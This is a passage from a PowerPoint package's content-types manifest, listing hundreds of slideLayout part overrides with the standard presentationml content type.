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00.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1001.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1002.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1003.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1004.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1005.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1006.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1007.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1008.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1009.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1010.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1011.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1012.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1013.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1014.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1015.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1016.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1017.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1018.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1019.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1020.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1021.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1022.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1023.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1024.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1025.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1026.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1027.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1028.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1029.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1030.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1031.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1032.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1033.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1034.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1035.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1036.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1037.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1038.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1039.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1040.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1041.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1042.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1043.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1044.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1045.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1046.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1047.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1048.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1049.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1050.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1051.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1052.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1053.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1054.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1055.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1056.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1057.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1058.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1059.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1060.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1061.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1062.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1063.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1064.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1065.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1066.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1067.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1068.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1069.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1070.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1071.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1072.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1073.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1074.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1075.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1076.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1077.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1078.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1079.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1080.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1081.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1082.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1083.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1084.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1085.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1086.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1087.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1088.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1089.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1090.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1091.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1092.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1093.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1094.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1095.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1096.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1097.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1098.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout109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00.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1118.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1121.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1122.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1123.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1124.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1125.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1126.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1127.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1128.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1129.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1130.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1132.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1133.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1134.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1135.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1136.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1139.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1143.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1153.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1155.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1158.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1159.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1160.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1161.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1162.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1163.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1164.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1165.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1166.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1168.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1169.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1171.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1174.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1175.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1176.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1177.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1178.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1179.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout118.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1180.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slideLayouts/slideLayout936.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout937.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout938.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout939.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout94.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout940.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout941.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout942.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout943.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout944.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout945.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout946.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout947.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout948.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout949.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
